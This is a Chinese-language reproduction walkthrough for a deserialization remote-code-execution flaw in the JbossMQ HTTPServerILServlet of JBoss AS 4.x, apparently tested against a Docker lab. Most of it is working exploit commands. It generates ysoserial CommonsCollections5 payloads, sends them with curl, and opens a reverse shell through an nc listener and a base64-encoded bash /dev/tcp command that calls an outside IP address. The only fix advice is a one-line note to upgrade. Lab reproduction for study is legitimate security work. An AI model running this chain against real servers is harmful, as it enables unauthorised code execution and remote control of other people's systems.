漏洞描述
Red Hat Jboss AS 4.X及之前的版本中的JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在安全漏洞。远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
需要:ysoserial 反序列化工具
如果漏洞复现过程中有问题,可能是因为java版本问题
存在漏洞页面
/jbossmq-httpil/HTTPServerILServlet
(1)尝试 创建 /tmp/123 文件夹
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/123" > 1.ser
# 利用jar包生成一个创建success文件的payload文件1.ser
curl http://192.168.216.189:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# 利用curl工具向jbossmq-httpil/HTTPServerILServlet 发送一个1.ser的请求
进入docker 环境查看是否创建成功
docker ps
docker exec -it id bash
ls .tmp
发现创建123成功
(2) 反弹shell
1.开启监听
nc -lvvp port
2.执行命令
bash -i >& /dev/tcp/ip/9897 0>&1
base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA+JjE=
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}" > 1.ser
#利用jar包生成一个执行反弹shell的payload文件1.ser bash命令 base64编码
curl http://192.168.216.189:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# 利用curl工具向jbossmq-httpil/HTTPServerILServlet 发送一个1.ser的请求
反弹shell成功
漏洞修复
升级版本